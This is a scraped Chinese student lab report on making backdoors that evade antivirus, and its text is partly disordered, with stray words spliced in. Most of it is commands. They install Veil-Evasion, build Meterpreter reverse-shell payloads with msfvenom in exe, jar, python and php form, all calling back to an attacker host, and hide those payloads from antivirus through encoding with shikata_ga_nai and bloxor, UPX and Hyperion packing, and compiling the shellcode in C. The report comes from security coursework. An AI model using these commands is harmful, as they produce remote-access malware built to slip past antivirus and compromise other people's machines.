返回目錄php
本次實驗中,對我來講最困難的兩件事就是veil的安裝和任務二的實現免殺T-T,其餘內容按照實驗指導都很容易理解和實現。實驗告訴了我,殺軟並不可信,有些後門程序能夠躲過它們的檢測並對咱們產生威脅,因此安全意識相當重要。(PS.經過實驗真心以爲查殺方和攻擊方都挺不容易的。。)java
返回目錄python
安裝Veil-Evasion,親測克隆安裝的成功率會大一些:git
sudo apt-get -y install git //安裝git git clone https://github.com/Veil-Framework/Veil-Evasion.git //git命令行下載Veil Evasion mv Veil-Evasion /opt //把它移動到opt目錄下(可選) cd /opt/Veil-Evasion/ //進入Veil Evasion所在目錄 bash setup/setup.sh -s //啓動setup腳本開始安裝
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.127 LPORT=5309 -f exe > 5309_backdoor.exe
生成後門程序。(同實驗二)msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b ‘\x00’ LHOST=10.0.0.127 LPORT=5309 -f exe > 5309time10.exe
-e
選擇要用的編碼器,-i
用於設置編碼次數,-b
設定payload中須要去除的字符。msfvenom -p java/meterpreter/reverse_tcp LHOST=10.0.0.127 LPORT=5309 x> wsj_jar.jar
指令:msfvenom -p python/meterpreter/reverse_tcp LHOST=10.0.0.127 LPORT=5309 -f raw > wsj_py.py
github
msfvenom -p php/meterpreter/reverse_tcp LHOST=10.0.0.127 LPORT=5309 x> wsj_php.php
veil
->use evasion
進入Evil-Evasion配置界面:upx wsjpayload.exe -o wsjpayload.upxed.exe
/usr/share/windows-binaries/hyperion/
,並進入。wine hyperion.exe -v wsj_upxed.exe wsj_upxed_Hyperion.exe
msfvenom -p windows/meterpreter/reverse_http LHOST=10.0.0.127 LPORT=5309 -f c
i686-w64-mingw32-g++ 5309.c -o 5309.exe
加殼+迭代+C語言調用bloxor編碼的shellcode
的方式免殺成功並可回連:
msfvenom -p windows/meterpreter/reverse_tcp -e x86/bloxor LHOST=10.0.0.127 LPORT=5309 -f c
;返回目錄shell